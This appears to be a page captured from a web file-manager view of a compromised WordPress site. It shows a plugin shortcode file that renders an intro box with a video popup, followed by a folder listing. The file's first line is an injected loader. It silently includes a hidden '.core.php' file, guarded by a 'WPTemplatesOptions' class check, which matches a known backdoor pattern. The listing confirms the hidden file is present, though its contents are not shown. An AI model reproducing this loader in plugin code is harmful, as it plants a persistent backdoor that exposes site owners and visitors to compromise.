PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-shortcodes
/
core
<?php if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } function wilcity_render_intro_box($aAtts){ $classes = !empty($aAtts['extra_class']) ? $aAtts['extra_class'] . ' row equal-height equal-height-center' : 'row equal-height equal-height-center'; ?> <div class="<?php echo esc_attr($classes); ?>"> <div class="col-md-6 col-lg-6 "> <!-- video-popup_module__2P6ZG --> <?php if ( !empty($aAtts['video_intro']) ) : ?> <div class="video-popup_module__2P6ZG video-popup_round__2d8uy video-popup-parallax-inner" data-hover-parallax-options="3d"> <div class="video-popup_media__dEwwq"> <div class="video-popup_overlay__2lJoC"></div> <div class="video-popup_img__3zV5d bg-cover" style="background-image: url('<?php echo esc_url($aAtts['bg_img']); ?>')"></div><a class="video-popup_popup__17b-F js-video-popup" href="<?php echo esc_url(\WILCITY_SC\SCHelpers::cleanYoutubeUrl($aAtts['video_intro'])); ?>"><i class="la la-play"></i></a> </div> </div><!-- End / video-popup_module__2P6ZG --> <?php else: ?> <div class="bg-cover" style="background-image: url(<?php echo esc_url($aAtts['bg_img']); ?>)"> <img src="<?php echo esc_url($aAtts['bg_img']); ?>" alt="<?php esc_html_e('Image Background', 'wiloke-shortcodes'); ?>"> </div> <?php endif; ?> </div> <div class="col-md-6 col-lg-6 "> <div> <?php echo do_shortcode($aAtts['intro']); ?> </div> </div> </div> <?php }
[+]
..
[-] wilcity_render_testimonial_item.php
[edit]
[-] wilcity_render_team_intro_slider.php
[edit]
[-] wilcity_render_modern_term_box.php
[edit]
[-] wilcity_render_modern_term_boxes.php
[edit]
[-] .core.php
[edit]
[-] wilcity_render_contact_us.php
[edit]
[-] wilcity_render_restaurant_listing.php
[edit]
[-] wilcity_render_team_intro_slider_item.php
[edit]
[-] wilcity_render_term_boxes.php
[edit]
[-] wilcity_render_post_types.php
[edit]
[-] wilcity_event_slider_item.php
[edit]
[-] wilcity_listing_slider_item.php
[edit]
[-] wilcity_render_box_icon.php
[edit]
[-] wilcity_render_new_grid.php
[edit]
[-] wilcity_render_hero_search_form.php
[edit]
[-] wilcity_render_term_masonry_items.php
[edit]
[-] wilcity_render_wiloke_wave.php
[edit]
[-] wilcity_render_grid_post.php
[edit]
[-] wilcity_render_rectangle_term_boxes.php
[edit]
[-] wilcity_render_restaurant_listings.php
[edit]
[-] wilcity_widget_list_style.php
[edit]
[-] wilcity_render_heading_ribbon.php
[edit]
[-] wilcity_render_testimonials.php
[edit]
[-] wilcity_render_restaunrant_menu_item.php
[edit]
[-] wilcity_render_events_grid.php
[edit]
[-] wilcity_render_image_box.php
[edit]
[-] wilcity_render_intro_box.php
[edit]
[-] wilcity_render_term_box.php
[edit]
[-] wilcity_render_listings_tabs.php
[edit]
[-] wilcity_render_restaurant_list_menu.php
[edit]
[-] wilcity_render_slider.php
[edit]
[-] wilcity_render_heading.php
[edit]
[-] wilcity_render_event_item.php
[edit]
[-] wilcity_render_rectangle_term_box.php
[edit]
[-] wilcity_post_slider_item.php
[edit]
[-] wilcity_render_terms_slider.php
[edit]
[-] wilcity_render_term_masonry_item.php
[edit]
[-] wilcity_render_grid_item.php
[edit]
[-] wilcity_render_full_width_list_item.php
[edit]
[-] wilcity_render_map.php
[edit]
[-] wilcity_render_hero.php
[edit]
[-] wilcity_terms_box.php
[edit]
[-] wilcity_render_author_slider.php
[edit]
[-] wilcity_render_grid.php
[edit]